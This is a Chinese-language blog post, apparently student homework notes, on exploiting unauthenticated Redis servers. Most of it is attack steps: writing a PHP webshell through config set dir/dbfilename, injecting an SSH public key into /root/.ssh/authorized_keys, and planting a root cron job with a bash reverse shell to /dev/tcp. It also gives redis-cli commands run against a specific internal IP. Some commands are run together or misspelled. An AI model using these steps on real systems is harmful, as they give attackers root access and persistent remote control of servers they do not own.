6月份作业之redis未授权漏洞利用

偶然发现某大佬博客说了一下Redis的漏洞，便整理了一下笔记，并做了实战测试0x00 笔记

1.写入webshell

dir=绝对路径

dbfilename="1.php"

2.写入ssh公钥匙

本机生成公钥 sshssh-keygen-trsa-C"test@test"

dir=/root/.ssh/

dbfilename=authorized_keys

\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n

3.写入定时任务，反弹shell

dir=/var/spool/cron

dbfilename=root

setcrack"\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n"0x01 实战测试使用redisk客户端链接远程主机端口

IP打码了（这码打得不错吧）拿WEBSHELL过程：

configsetdir 网站绝对路径

configsetdbfilename info.php //设置info.php为备份文件

setweb''//写入一句话到info.php

save //保存，然后即可通过菜刀url链接info.php即可最后Getshell：

0x0000 补充

ssh-keygen -t rsa

输入保存路径

输入密码：dyboy

重复输入密码：dyboy

saved in /root/.ssh/id_rsa.

key has been saved in /root/.ssh/id_rsa.pub.

将公钥写入foo.txt

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

执行命令：

cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

回显OK

连接主机，进入shell：

/usr/redis/redis-cli -h 172.16.12.2 -p 6379

config set dir /root/.ssh/

config set dbfilename "authorized_keys"

save

exit

通过ssh链接主机